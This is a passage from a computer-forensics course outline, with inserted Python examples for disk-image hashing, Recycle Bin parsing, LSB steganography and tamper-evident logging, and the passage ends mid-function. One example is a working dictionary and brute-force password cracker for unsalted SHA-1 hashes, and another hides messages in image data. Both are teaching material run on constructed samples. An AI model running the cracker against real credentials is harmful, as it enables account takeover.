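    is collision-prone, so SHA-256 is the value to anchor the chain of custody."""
    actual = hash_file(image_path)
    return {
        "size_match": actual["bytes"] == acquisition["bytes"],
        "md5_match": actual["md5"] == acquisition["md5"],
        "sha256_match": actual["sha256"] == acquisition["sha256"],
    }


def demo():
    """Acquire a constructed 10,000-byte 'device', validate the image, then flip
    one byte of the image and show that validation catches it."""
    with tempfile.TemporaryDirectory() as workdir:
        device = os.path.join(workdir, "sdb")            # stand-in for /dev/sdb
        image = os.path.join(workdir, "sdb.dd")
        with open(device, "wb") as f:
            f.write(b"EVIDENCE" * 1000 + b"\x00" * 2000)  # constructed sample contents
        record = acquire_image(device, image)
        clean = verify_image(record, image)
        with open(image, "r+b") as f:                    # simulate corruption of the copy
            f.seek(100)
            f.write(b"X")
        tampered = verify_image(record, image)
        return record, clean, tampered


if __name__ == "__main__":
    record, clean, tampered = demo()
    print("acquired %d bytes, sha256=%s" % (record["bytes"], record["sha256"]))
    print("clean image:", clean)
    print("after one flipped byte:", tampered)
```

Record the acquisition digests and the validation result in the chain-of-custody form at the time of imaging; a later hash of the image that does not match the acquisition record means the copy, not the original, is in doubt, and analysis should stop until that is resolved.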
ThumbsDisplay Screenshot DataLifter X-Ways Forensics R-drive Image Demo - Forensic Imaging DriveLook DiskExplorer P2 eXplorer Pro Flash Retriever Forensic Edition Module Flow: Data Acquisition Hardware Tools US-LATT Image MASSter: Solo-4 (Super Kit) Image MASSter: RoadMASSter- 3 Tableau TD1 Forensic Duplicator Logicube: Forensic MD5 Logicube: Portable Forensic Lab Logicube: Forensic Talon Logicube: RAID I/O Adapter DeepSpar: Disk Imager Forensic Edition Logicube: USB Adapter Disk Jockey PRO Logicube: Forensic Quest-2 Logicube: CloneCard Pro Logicube: EchoPlus Paraben Forensics Hardware: Chat Stick Image MASSter: Rapid Image 7020CS IT Digital Intelligence Forensic Hardware: UltraKit Digital Intelligence Forensic Hardware: UltraBay II Digital Intelligence Forensic Hardware: UltraBlock SCSI Digital Intelligence Forensic Hardware: HardCopy 3P Wiebetech: Forensics DriveDock v4 Wiebetech: Forensics UltraDock v4 Image MASSter: WipeMASSter Image MASSter: WipePRO Portable Forensic Systems and Towers: Forensic Air-Lite V MK III Forensic Tower IV Dual Xeon Digital Intelligence Forensic Hardware: FREDDIE DeepSpar: 3D Data Recovery Phase 1 Tool: PC-3000 Drive Restoration System Phase 2 Tool: DeepSpar Disk Imager Phase 3 Tool: PC-3000 Data Extractor Logicube: Cables Logicube: Adapters Logicube: GPStamp Logicube: OmniPort Logicube: CellDEK Paraben Forensics Hardware: Project-a-Phone Paraben Forensics Hardware: Mobile Field Kit Paraben Forensics Hardware: iRecovery Stick CelleBrite: UFED System CelleBrite: UFED Physical Pro Module 09 Review Module 10 - Recovering Deleted Files and Deleted Partition Module Flow: Recovering the Deleted Files Deleting Files What Happens When a File is Deleted in Windows? 
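Added example (not course material): a parser for the Recycle Bin metadata records that the "How the Recycle Bin Works" and "Damaged or Deleted INFO File" slides describe. On Vista and later each deleted file becomes a `$R<id>.<ext>` (content) and `$I<id>.<ext>` (metadata) pair under `$Recycle.Bin\<SID>\`; the `$I` record holds the original size, the deletion FILETIME and the original path. The layout used here is version 1 (Vista/7/8: 8-byte version, 8-byte size, 8-byte FILETIME, 520-byte UTF-16LE path) and version 2 (Windows 10: a 4-byte character count precedes the path). The two records parsed by `demo()` are constructed with `build_i_file` rather than taken from a disk; function names are this example's own.

```python
import datetime
import struct

# 1970-01-01 expressed in FILETIME ticks (100 ns units since 1601-01-01 UTC)
FILETIME_UNIX_EPOCH = 116444736000000000
_UNIX_EPOCH = datetime.datetime(1970, 1, 1, tzinfo=datetime.timezone.utc)


def filetime_to_datetime(ticks):
    """FILETIME -> aware UTC datetime (microsecond precision is enough for a report)."""
    return _UNIX_EPOCH + datetime.timedelta(microseconds=(ticks - FILETIME_UNIX_EPOCH) // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime, done in integers to avoid float rounding."""
    delta = dt - _UNIX_EPOCH
    seconds = delta.days * 86400 + delta.seconds
    return seconds * 10_000_000 + delta.microseconds * 10 + FILETIME_UNIX_EPOCH


def parse_i_file(blob):
    """Decode one $I record. Raises ValueError on a truncated or unknown layout
    (the 'damaged INFO file' case) instead of returning a half-parsed record."""
    if len(blob) < 24:
        raise ValueError("truncated $I header: need 24 bytes, got %d" % len(blob))
    version, size, ticks = struct.unpack_from("<QQQ", blob, 0)
    if version == 1:
        raw = blob[24:24 + 520]                       # fixed 260-char UTF-16LE field
        if len(raw) != 520:
            raise ValueError("version-1 record must carry a 520-byte path field")
        path = raw.decode("utf-16-le").split("\x00", 1)[0]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", blob, 24)  # includes the terminator
        raw = blob[28:28 + 2 * nchars]
        if len(raw) != 2 * nchars:
            raise ValueError("version-2 path field shorter than its declared length")
        path = raw.decode("utf-16-le").rstrip("\x00")
    else:
        raise ValueError("unsupported $I version %d" % version)
    return {"version": version, "original_size": size,
            "deleted_utc": filetime_to_datetime(ticks), "original_path": path}


def r_file_for(i_file_name):
    """The $I record's content lives in the $R file with the same id and extension."""
    if not i_file_name.startswith("$I"):
        raise ValueError("not a $I file name: %r" % i_file_name)
    return "$R" + i_file_name[2:]


def build_i_file(version, size, deleted_utc, path):
    """Construct a sample record for the demo (real ones are read from $Recycle.Bin)."""
    header = struct.pack("<QQQ", version, size, datetime_to_filetime(deleted_utc))
    encoded = path.encode("utf-16-le") + b"\x00\x00"
    if version == 1:
        return header + encoded.ljust(520, b"\x00")
    return header + struct.pack("<I", len(path) + 1) + encoded


def demo():
    """Build one record of each version (constructed data) and parse both."""
    deleted = datetime.datetime(2012, 3, 15, 12, 34, 56, tzinfo=datetime.timezone.utc)
    path = r"C:\Users\alice\Documents\offer.docx"
    v1 = parse_i_file(build_i_file(1, 1234567, deleted, path))
    v2 = parse_i_file(build_i_file(2, 1234567, deleted, path))
    return {"v1": v1, "v2": v2, "content_file": r_file_for("$IABC123.docx")}


if __name__ == "__main__":
    for name, rec in demo().items():
        print(name, rec)
```

Pair each parsed `$I` with its `$R` file before reporting: a `$R` whose `$I` is missing still holds content but has lost its original path and deletion time, which is the situation the "Damaged Files in Recycle Bin Folder" slides cover.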
  Recycle Bin in Windows
  Storage Locations of Recycle Bin in FAT and NTFS Systems
  How the Recycle Bin Works
  Demo - Recycle Bins
  Damaged or Deleted INFO File
  Damaged Files in Recycle Bin Folder
  Damaged Recycle Folder
  File Recovery in Mac OS X
  File Recovery in Linux
Module Flow: File Recovery Tools for Windows
  Recover My Files
  EASEUS Data Recovery Wizard
  PC INSPECTOR File Recovery
  Demo - PC INSPECTOR File Recovery
  Recuva
  DiskDigger
  Handy Recovery
  Quick Recovery
  Stellar Phoenix Windows Data Recovery
  Tools to Recover Deleted Files
Module Flow: File Recovery Tools for Mac
  Mac File Recovery
  Mac Data Recovery
  Boomerang Data Recovery Software
  VirtualLab
  File Recovery Tools for Mac OS X
Module Flow: File Recovery Tools for Linux
  R-Studio for Linux
  Quick Recovery for Linux
  Kernel for Linux Data Recovery
  TestDisk for Linux
  Demo - File Carving
Module Flow: Recovering the Deleted Partitions
  Disk Partition
  Deletion of Partition
  Recovery of the Deleted Partition
Module Flow: Partition Recovery Tools
  Active@ Partition Recovery for Windows
  Acronis Recovery Expert
  DiskInternals Partition Recovery
  NTFS Partition Data Recovery
  GetDataBack
  EASEUS Partition Recovery
  Advanced Disk Recovery
  Power Data Recovery
  Remo Recover (Mac) - Pro
  Mac Data Recovery Software
  Quick Recovery for Linux
  Stellar Phoenix Linux Data Recovery Software
  Tools to Recover Deleted Partitions
  Demo - Partition Recovery
  Module 10 Review

Module 11 - Forensics Investigation Using AccessData FTK (3h 9m)
Module Flow: Overview and Installation of FTK
  Overview of Forensic Toolkit (FTK)
  Features of FTK
  Software Requirement
  Configuration Option
  Database Installation
  FTK Application Installation (1 of 6 through 6 of 6)
Module Flow: FTK Case Manager User Interface
  Case Manager Window
  Case Manager Database Menu
  Setting Up Additional Users and Assigning Roles
  Case Manager Case Menu
  Assigning Users Shared Label Visibility
  Case Manager Tools Menu
  Recovering Processing Jobs
  Restoring an Image to a Disk
  Case Manager Manage Menu
  Managing Carvers
  Managing Custom Identifiers
Module Flow: FTK Examiner User Interface
  FTK Examiner User Interface
  Menu Bar: File Menu
  Exporting Files
  Exporting Case Data to a Custom Content Image
  Exporting the Word List
  Menu Bar: Edit Menu
  Menu Bar: View Menu
  Menu Bar: Evidence Menu
  Menu Bar: Tools Menu
  Verifying Drive Image Integrity
  Demo - Verifying Image Integrity
  Mounting an Image to a Drive
  File List View
  Using Labels
  Creating and Applying a Label
Module Flow: Starting with FTK
  Creating a Case
  Selecting Detailed Options: Evidence Processing
  Selecting Detailed Options: Fuzzy Hashing
  Selecting Detailed Options: Data Carving
  Selecting Detailed Options: Custom File Identification
  Selecting Detailed Options: Evidence Refinement (Advanced)
  Selecting Detailed Options: Index Refinement (Advanced)
Module Flow: FTK Interface Tabs
  Demo - FTK Imaging and Adding
  FTK Interface Tabs
  Explore Tab
  Overview Tab
  Email Tab
  Graphics Tab
  Bookmarks Tab
  Live Search Tabs
  Volatile Tab
  Demo - File Overview Tab
Module Flow: Adding and Processing Static, Live, and Remote Evidence
  Adding Evidence to a Case
  Evidence Groups
  Acquiring Local Live Evidence
  FTK Role Requirements for Remote Acquisition
  Types of Remote Information
  Acquiring Data Remotely Using Remote Device Management System (RDMS)
  Imaging Drives
  Mounting and Unmounting a Device
Module Flow: Using and Managing Filters
  Accessing Filter Tools
  Using Filters
  Customizing Filters
  Using Predefined Filters
  Demo - Filtering
Module Flow: Using Index Search and Live Search
  Conducting an Index Search
  Selecting Index Search Options
  Viewing Index Search Results
  Documenting Search Results
  Conducting a Live Search: Live Text Search
  Conducting a Live Search: Live Hex Search
  Conducting a Live Search: Live Pattern Search
  Demo - Indexed and Live Searches
  Demo - FTK File Carving
Module Flow: Decrypting EFS and Other Encrypted Files
  Decrypting EFS Files and Folders
  Decrypting MS Office Files
  Viewing Decrypted Files
  Decrypting Domain Account EFS Files from Live Evidence
  Decrypting Credant Files
  Decrypting Safeboot Files
  Demo - FTK File Encryption
Module Flow: Working with Reports
  Creating a Report
  Entering Case Information
  Managing Bookmarks in a Report
  Managing Graphics in a Report
  Selecting a File Path List
  Adding a File Properties List
  Making Registry Selections
  Selecting the Report Output Options
  Customizing the Formatting of Reports
  Viewing and Distributing a Report
  Demo - Reporting
  Module 11 Review

Module 12 - Forensics Investigation Using EnCase (3h 18m)
Module Flow: Overview of EnCase Forensic
  Official Licensed Content Provided by EnCase to EC-Council
  Overview of EnCase Forensic
  EnCase Forensic Features
  EnCase Forensic Platform
  EnCase Forensic Modules
Module Flow: Installing EnCase Forensic
  Minimum Requirements
  Installing the Examiner
  Installed Files
  Installing the EnCase Modules
  Configuring EnCase
  Configuring EnCase: Case Options Tab
  Configuring EnCase: Global Tab
  Configuring EnCase: Debug Tab
  Configuring EnCase: Colors Tab and Fonts Tab
  Configuring EnCase: EnScript Tab and Storage Paths Tab
  Sharing Configuration (INI) Files
Module Flow: EnCase Interface
  Demo - EnCase Options
  Main EnCase Window
  System Menu Bar
  Toolbar
  Panes Overview
  Tree Pane
  Table Pane
  Table Pane: Table Tab
  Table Pane: Report Tab
  Table Pane: Gallery Tab
  Table Pane: Timeline Tab
  Table Pane: Disk Tab and Code Tab
  View Pane
  Filter Pane
  Filter Pane Tabs
  Creating a Filter
  Creating Conditions
  Status Bar
  Demo - EnCase Tabs and Views
Module Flow: Case Management
  Overview of Case Structure
  Case Management
  Indexing a Case
  Case Backup
  Options Dialog Box
  Logon Wizard
  New Case Wizard
  Setting Time Zones for Case Files
  Setting Time Zone Options for Evidence Files
Module Flow: Working with Evidence
  Types of Entries
  Adding a Device
  Adding a Device Using Tableau Write Blocker
  Performing a Typical Acquisition
  Acquiring a Device
  Canceling an Acquisition
  Verifying Evidence Files
  Demo - Imaging with EnCase
  Delayed Loading of Internet Artifacts
  Hashing the Subject Drive
  Logical Evidence File (LEF)
  Creating a Logical Evidence File
  Recovering Folders on FAT Volumes
  Restoring a Physical Drive
  Demo - Restoring a Drive from an Image
Module Flow: Source Processor
  Source Processor
  Starting to Work with Source Processor
  Setting Case Options
  Collection Jobs
  Creating a Collection Job
  Copying a Collection Job
  Running a Collection Job
  Analysis Jobs
  Creating an Analysis Job
  Running an Analysis Job
  Creating a Report
  Demo - EnScripts
Module Flow: Analyzing and Searching Files
  Viewing the File Signature Directory
  Performing a Signature Analysis
  Hash Analysis
  Hashing a New Case
  Demo - Signature Analysis and Hashing
  Creating a Hash Set
  Keyword Searches
  Creating Global Keywords
  Adding Keywords
  Importing and Exporting Keywords
  Searching Entries for Email and Internet Artifacts
  Viewing Search Hits
  Generating an Index
  Tag Records
  Demo - Keyword Searcher
Module Flow: Viewing File Content
  Viewing Files
  Copying and Unerasing Files
  Adding a File Viewer
  Demo - Adding a File Viewer
  Viewing File Content Using View Pane
  Viewing Compound Files
  Viewing Base64 and UUE Encoded Files
  Demo - Compound Files
Module Flow: Bookmarking Items
  Bookmarks Overview
  Creating a Highlighted Data Bookmark
  Creating a Note Bookmark
  Creating a Folder Information/Structure Bookmark
  Creating a Notable File Bookmark
  Creating a File Group Bookmark
  Creating a Log Record Bookmark
  Creating a Snapshot Bookmark
  Organizing Bookmarks
  Copying/Moving a Table Entry into a Folder
  Viewing a Bookmark on the Table Report Tab
  Excluding Bookmarks
  Copying Selected Items from One Folder to Another
  Demo - Bookmarks
Module Flow: Reporting
  Reporting
  Report User Interface
  Creating a Report Using the Report Tab
  Report Single/Multiple Files
  Viewing a Bookmark Report
  Viewing an Email Report
  Viewing a Webmail Report
  Viewing a Search Hits Report
  Creating a Quick Entry Report
  Creating an Additional Fields Report
  Exporting a Report
  Demo - Reporting
  Module 12 Review

Module 13 - Steganography and Image File Forensics (2h 11m)
Module Flow: Steganography
  What is Steganography?
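Added example (not course material): a working least-significant-bit embed/extract pair for Module 13's "Image Steganography" and "Least Significant Bit Insertion" slides, plus the one measurement a steganalyst reaches for first. The carrier is treated as a flat sequence of 8-bit samples (the pixel bytes of an uncompressed BMP or a raw channel), so no image library is needed; the sample cover is a constructed smooth gradient, and the 4-byte length header and the function names are this example's own conventions, not those of any tool the module lists.

```python
import struct

HEADER_BITS = 32          # a 4-byte big-endian payload length is embedded first


def _bits(data):
    """Yield the bits of data, most significant bit first, one per cover sample."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def capacity(cover):
    """Payload bytes that fit at one bit per sample, after the length header."""
    return max(0, (len(cover) - HEADER_BITS) // 8)


def embed(cover, payload):
    """Overwrite bit 0 of successive samples with header+payload bits.
    Each sample changes by at most 1, which is why the result looks identical."""
    if len(payload) > capacity(cover):
        raise ValueError("payload of %d bytes exceeds capacity of %d bytes"
                         % (len(payload), capacity(cover)))
    stego = bytearray(cover)
    for i, bit in enumerate(_bits(struct.pack(">I", len(payload)) + payload)):
        stego[i] = (stego[i] & 0xFE) | bit
    return bytes(stego)


def _read(stego, first_sample, nbytes):
    out = bytearray()
    for b in range(nbytes):
        value = 0
        for k in range(8):
            value = (value << 1) | (stego[first_sample + 8 * b + k] & 1)
        out.append(value)
    return bytes(out)


def extract(stego):
    """Recover the payload; an implausible length header means no payload of
    this scheme is present (LSBs of an untouched image decode to noise)."""
    (length,) = struct.unpack(">I", _read(stego, 0, 4))
    if length > capacity(stego):
        raise ValueError("length header inconsistent with carrier size")
    return _read(stego, HEADER_BITS, length)


def max_sample_change(cover, stego):
    return max(abs(a - b) for a, b in zip(cover, stego))


def lsb_transition_rate(data, n):
    """Steganalysis hint: fraction of adjacent samples whose LSBs differ, over
    the first n samples. Smooth image regions have long runs of equal LSBs;
    an embedded message makes the LSB plane look random (rate near 0.5)."""
    bits = [b & 1 for b in data[:n]]
    return sum(bits[i] != bits[i + 1] for i in range(len(bits) - 1)) / (len(bits) - 1)


if __name__ == "__main__":
    cover = bytes((i // 16) % 256 for i in range(4096))   # constructed gradient "image"
    payload = b"meet at 0300"
    stego = embed(cover, payload)
    used = HEADER_BITS + 8 * len(payload)
    print("recovered:", extract(stego))
    print("max change per sample:", max_sample_change(cover, stego))
    print("LSB transition rate cover/stego: %.3f / %.3f"
          % (lsb_transition_rate(cover, used), lsb_transition_rate(stego, used)))
```

The transition-rate comparison is the idea behind the statistical checks listed under "How to Detect Steganography": the change is invisible to the eye but not to a measurement of the LSB plane, provided the analyst knows roughly which region was used.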
  How Steganography Works
  Legal Use of Steganography
  Unethical Use of Steganography
Module Flow: Steganography Techniques
  Steganography Techniques
  Application of Steganography
  Classification of Steganography
  Technical Steganography
  Linguistic Steganography
  Types of Steganography
  Image Steganography
  Least Significant Bit Insertion
  Masking and Filtering
  Algorithms and Transformation
  Image Steganography: Hermetic Stego
  Steganography Tool: S-Tools
  Image Steganography Tools
  Audio Steganography
  Audio Steganography Methods
  Audio Steganography: Mp3stegz
  Audio Steganography Tools
  Video Steganography
  Video Steganography: MSU StegoVideo
  Video Steganography Tools
  Document Steganography: wbStego
  Byte Shelter I
  Document Steganography Tools
  Whitespace Steganography Tool: SNOW
  Folder Steganography: Invisible Secrets 4
  Demo - Invisible Secrets
  Folder Steganography Tools
  Spam/Email Steganography: Spam Mimic
  Steganographic File System
  Issues in Information Hiding
Module Flow: Steganalysis
  Steganalysis
  How to Detect Steganography
  Detecting Text, Image, Audio, and Video Steganography
  Steganalysis Methods/Attacks on Steganography
  Disabling or Active Attacks
  Steganography Detection Tool: Stegdetect
  Steganography Detection Tools
  Demo - Steg Detection
Module Flow: Image Files
  Image Files
  Common Terminologies
  Understanding Vector Images
  Understanding Raster Images
  Metafile Graphics
  Understanding Image File Formats
  GIF (Graphics Interchange Format)
  JPEG (Joint Photographic Experts Group)
  JPEG File Structure
  JPEG 2000
  BMP (Bitmap) File
  BMP File Structure
  PNG (Portable Network Graphics)
  PNG File Structure
  TIFF (Tagged Image File Format)
  TIFF File Structure
Module Flow: Data Compression
  Understanding Data Compression
  How Does File Compression Work?
  Lossless Compression
  Huffman Coding Algorithm
  Lempel-Ziv Coding Algorithm
  Lossy Compression
  Vector Quantization
Module Flow: Locating and Recovering Image Files
  Best Practices for Forensic Image Analysis
  Forensic Image Processing Using MATLAB
  Advantages of MATLAB
  MATLAB Screenshot
  Locating and Recovering Image Files
  Analyzing Image File Headers
  Repairing Damaged Headers
  Reconstructing File Fragments
  Identifying Unknown File Formats
  Identifying Image File Fragments
  Identifying Copyright Issues on Graphics
  Picture Viewer: IrfanView
  Picture Viewer: ACDSee Photo Manager 12
  Picture Viewer: ThumbsPlus
  Picture Viewer: AD Picture Viewer Lite
  Picture Viewer Max
  Picture Viewer: FastStone Image Viewer
  Picture Viewer: XnView
  Demo - Picture Viewers
  Faces - Sketch Software
  Digital Camera Data Discovery Software: File Hound
Module Flow: Image File Forensics Tools
  Hex Workshop
  GFE Stealth - Forensics Graphics File Extractor
  ILook
  Adroit Photo Forensics 2011
  Digital Photo Recovery (with screenshots)
  Stellar Phoenix Photo Recovery Software
  Zero Assumption Recovery (ZAR)
  Photo Recovery Software
  Forensic Image Viewer
  File Finder
  DiskGetor Data Recovery
  DERescue Data Recovery Master
  Recover My Files
  Universal Viewer
  Module 13 Review

Module 14 - Application Password Crackers (1h 8m)
Module Flow: Password Cracking Concepts
  Password - Terminology
  Password Types
  Password Cracker
  How Does a Password Cracker Work?
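Added example (not course material and not the algorithm of any cracker the module lists): a minimal password cracker in Python illustrating "How Does a Password Cracker Work?", "Automatic Password Cracking Algorithm" and "Time Needed to Crack Passwords". It hashes candidates and compares them with the stored hash, first from a wordlist with mangling rules (case, leet, suffixes), then by exhaustive search, and it computes how long a full keyspace takes at a given hash rate. Unsalted SHA-1 stands in for whatever hash an application stores; the wordlist, target and rate are constructed for the demo.

```python
import hashlib
import itertools

# Mangling rules: the transformations real rule engines apply to each word.
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
SUFFIXES = ([""] + [str(n) for n in range(100)]
            + [str(year) for year in range(1980, 2013)] + ["!", "!1", "123"])


def mangle(word):
    """Yield unique candidates derived from one dictionary word."""
    seen = set()
    bases = (word, word.capitalize(), word.upper(),
             word.translate(LEET), word.capitalize().translate(LEET))
    for base in bases:
        for suffix in SUFFIXES:
            candidate = base + suffix
            if candidate not in seen:
                seen.add(candidate)
                yield candidate


def sha1_hex(password):
    """Stand-in for the application's stored hash (unsalted, hence crackable offline)."""
    return hashlib.sha1(password.encode()).hexdigest()


def dictionary_attack(target_hash, wordlist, hashfn=sha1_hex):
    """Hash every mangled candidate and compare. Returns (password or None, attempts)."""
    attempts = 0
    for word in wordlist:
        for candidate in mangle(word):
            attempts += 1
            if hashfn(candidate) == target_hash:
                return candidate, attempts
    return None, attempts


def brute_force(target_hash, charset, max_len, hashfn=sha1_hex):
    """Exhaustive search, shortest candidates first; only viable for tiny keyspaces."""
    attempts = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            attempts += 1
            candidate = "".join(combo)
            if hashfn(candidate) == target_hash:
                return candidate, attempts
    return None, attempts


def keyspace(charset_size, max_len):
    """Number of candidates of length 1..max_len over a charset."""
    return sum(charset_size ** n for n in range(1, max_len + 1))


def time_to_exhaust(charset_size, max_len, hashes_per_second):
    """Worst-case seconds to try the whole keyspace at a given rate."""
    return keyspace(charset_size, max_len) / hashes_per_second


def humanize(seconds):
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return "%.1f %s" % (seconds / size, unit)
    return "%.1f seconds" % seconds


if __name__ == "__main__":
    # Constructed target: an employee chose "Summer2012"; the wordlist is tiny.
    target = sha1_hex("Summer2012")
    print("dictionary:", dictionary_attack(target, ["password", "summer", "winter"]))
    print("brute force:", brute_force(sha1_hex("ab1"), "ab1", 3))
    # 95 printable ASCII characters, up to 8 long, at an assumed 1e9 SHA-1/s
    print("full 8-char keyspace:", humanize(time_to_exhaust(95, 8, 1e9)))
```

Two points the numbers make: a mangled dictionary finds "Summer2012" in under a thousand hashes while exhausting the 8-character printable keyspace takes months even at a billion hashes per second, and a per-user salt would force the attacker to repeat that work for every account instead of reusing precomputed tables (the "Rainbow Attacks: Pre-Computed Hash" slide).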
  How Password Hashes Are Stored in the Windows SAM
Module Flow: Types of Password Attacks
  Password Cracking Techniques
  Types of Password Attacks
  Passive Online Attacks: Wire Sniffing
  Password Sniffing
  Passive Online Attack: Man-in-the-Middle and Replay Attack
  Active Online Attack: Password Guessing
  Active Online Attack: Trojan/Spyware/Keylogger
  Active Online Attack: Hash Injection Attack
  Rainbow Attacks: Pre-Computed Hash
  Distributed Network Attack
  Elcomsoft Distributed Password Recovery
  Non-Electronic Attacks
  Manual Password Cracking (Guessing)
  Automatic Password Cracking Algorithm
  Time Needed to Crack Passwords
  Classification of Cracking Software
  System Software vs. Application Software
Module Flow: System Software Password Cracking
  System Software Password Cracking
  Bypassing BIOS Passwords
  Using Manufacturer's Backdoor Password to Access the BIOS
  Using Password Cracking Software
  CmosPwd
  Resetting the CMOS Using the Jumpers or Solder Beads
  Removing CMOS Battery
  Overloading the Keyboard Buffer and Using a Professional Service
  Tool to Reset Admin Password: Active@ Password Changer
  Tool to Reset Admin Password: Windows Key
Module Flow: Application Software Password Cracking
  Passware Kit Forensic
  Accent Keyword Extractor
  Distributed Network Attack
  Password Recovery Bundle
  Advanced Office Password Recovery
  Office Password Recovery
  Office Password Recovery Toolbox
  Office Multi-document Password Cracker
  Word Password Recovery Master
  Accent WORD Password Recovery
  Word Password
  PowerPoint Password Recovery
  PowerPoint Password
  Powerpoint Key
  Stellar Phoenix Powerpoint Password Recovery
  Excel Password Recovery Master
  Accent EXCEL Password Recovery
  Excel Password
  Advanced PDF Password Recovery
  PDF Password Cracker
  PDF Password Cracker Pro
  Atomic PDF Password Recovery
  PDF Password
  Recover PDF Password
  Appnimi PDF Password Recovery
  Advanced Archive Password Recovery
  KRyLack Archive Password Recovery
  Zip Password
  Atomic ZIP Password Recovery
  RAR Password Unlocker
  Demo - Office Password Cracking
  Default Passwords
    http://www.defaultpassword.com
    http://www.cirt.net/passwords
    http://default-password.info
    http://www.defaultpassword.us
    http://www.passwordsdatabase.com
    http://www.virus.org
Module Flow: Password Cracking Tools
  L0phtCrack
  Ophcrack
  Cain & Abel
  RainbowCrack
  Windows Password Unlocker
  Windows Password Breaker
  SAMInside
  PWdump7 and Fgdump
  Password Cracking Tools
  Demo - System Password Cracking
  Module 14 Review

Module 15 - Log Capturing and Event Correlation (1h 23m)
Module Flow: Computer Security Logs
  Computer Security Logs
  Operating System Logs
  Application Logs
  Security Software Logs
  Router Log Files
  Honeypot Logs
  Linux Process Accounting
  Logon Event in Windows
  Windows Log File
  Configuring Windows Logging
  Analyzing Windows Logs
  Windows Log File: System Logs
  Windows Log Files: Application Logs
  Logon Events that Appear in the Security Event Log
  Demo - Windows Event Viewer
  IIS Logs
  IIS Log File Format
  Maintaining Credible IIS Log Files
  Log File Accuracy
  Log Everything
  Keeping Time
  UTC Time
  View the DHCP Logs
  Sample DHCP Audit Log File
  ODBC Logging
Module Flow: Logs and Legal Issues
  Legality of Using Logs
  Records of Regularly Conducted Activity as Evidence
  Laws and Regulations
Module Flow: Log Management
  Log Management
  Functions of Log Management
  Challenges in Log Management
  Meeting the Challenges in Log Management
Module Flow: Centralized Logging and Syslogs
  Centralized Logging
  Centralized Logging Architecture
  Steps to Implement Central Logging
  Syslog
  Syslog in Unix-Like Systems
  Steps to Set Up a Syslog Server for Unix Systems
  Advantages of Centralized Syslog Server
  IIS Centralized Binary Logging
Module Flow: Time Synchronization
  Why Synchronize Computer Times?
  What is NTP?
  NTP Stratum Levels
  NIST Time Servers
  Configuring Time Server in Windows Server
Module Flow: Event Correlation
  Event Correlation
  Types of Event Correlation
  Prerequisites for Event Correlation
  Event Correlation Approaches
Module Flow: Log Capturing and Analysis Tools
  GFI EventsManager (with screenshot)
  Activeworx Security Center
  EventLog Analyzer (with screenshot)
  Syslog-ng OSE (with screenshot)
  Kiwi Syslog Server (with screenshot)
  WinSyslog
  Firewall Analyzer: Log Analysis Tool
  Firewall Analyzer Architecture
  Firewall Analyzer Screenshot
  Activeworx Log Center
  EventReporter
  Kiwi Log Viewer
  Event Log Explorer
  WebLog Expert
  XpoLog Center Suite (with screenshot)
  ELM Event Log Monitor
  EventSentry
  LogMeister
  LogViewer Pro
  WinAgents EventLog Translation Service
  EventTracker Enterprise
  Corner Bowl Log Manager
  Ascella Log Monitor Plus
  FLAG - Forensic and Log Analysis GUI (with screenshot)
  Simple Event Correlator (SEC)
  OSSEC
  Module 15 Review

Module 16 - Network Forensics, Investigating Logs (1h 37m)
Module Flow: Network Forensics and Investigating Network Traffic
  Network Attack Statistics
  Network Forensics
  Network Forensics Analysis Mechanism
  Network Addressing Schemes
  Overview of Network Protocols
  Overview of Physical and Data-Link Layer of the OSI Model
  Overview of Network and Transport Layer of the OSI Model
  OSI Reference Model
  TCP/IP Protocol
  Intrusion Detection Systems (IDS) and Their Placement
  How IDS Works
  Types of Intrusion Detection Systems
  General Indications of Intrusions
  Firewall
  Honeypot
Module Flow: Network Attacks
  Network Vulnerabilities
  Types of Network Attacks
  IP Address Spoofing
  Man-in-the-Middle Attack
  Packet Sniffing
  How a Sniffer Works
  Enumeration
  Denial of Service Attack
  Session Sniffing
  Buffer Overflow
  Trojan Horse
Module Flow: Log Injection Attacks
  New Line Injection Attack
  New Line Injection Attack Countermeasure
  Separator Injection Attack
  Defending Separator Injection Attacks
  Timestamp Injection Attack
  Defending Timestamp Injection Attacks
  Word Wrap Abuse Attack
  Defending Word Wrap Abuse Attacks
  HTML Injection Attack
  Defending HTML Injection Attacks
  Terminal Injection Attack
  Defending Terminal Injection Attacks
Module Flow: Investigating and Analyzing Logs
  Postmortem and Real-Time Analysis
  Where to Look for Evidence
  Log Capturing Tool: ManageEngine EventLog Analyzer
  Log Capturing Tool: ManageEngine Firewall Analyzer
  Log Capturing Tool: GFI EventsManager (with screenshot)
  Log Capturing Tool: Kiwi Syslog Server (with screenshot)
  Handling Logs as Evidence
  Log File Authenticity
  Demo - Kiwi Log Viewer
  Use Signatures, Encryption, and Checksums
  Work with Copies
  Ensure System's Integrity
  Access Control
  Chain of Custody
  Condensing Log File
Module Flow: Investigating Network Traffic
  Why Investigate Network Traffic?
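Added example (not course material): one piece of code for two groups of Module 16 slides, the log injection attacks (new-line, separator, timestamp and terminal injection) and "Log File Authenticity" / "Use Signatures, Encryption, and Checksums". The attacker's username carries a CRLF, a forged second record with a chosen timestamp, and an ANSI erase-line escape; the logger escapes all of it so the record stays a single line with a fixed column count, stamps the time itself, and chains an HMAC over every record so that an inserted or edited line is caught. The pipe-separated format, the GENESIS value and the demo key are this example's own choices.

```python
import hashlib
import hmac
import re

SEP = " | "
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")      # CR, LF, ESC, BEL ... and DEL


def sanitize(field):
    """Neutralise new-line, separator and terminal-escape injection in one
    attacker-controlled field: backslashes and pipes are escaped, control
    characters become visible \\xNN, so the record keeps one line, keeps its
    column count and cannot drive an analyst's terminal."""
    text = str(field).replace("\\", "\\\\").replace("|", "\\|")
    return _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), text)


class TamperEvidentLog:
    """Append-only log with a MAC chain: mac_n = HMAC(key, mac_{n-1} || record_n).
    The timestamp is supplied by the logger, never copied from request data,
    which is the countermeasure to timestamp injection."""
    GENESIS = "0" * 64

    def __init__(self, key):
        self.key = key
        self.lines = []
        self.prev_mac = self.GENESIS

    def append(self, timestamp, client_ip, event, user):
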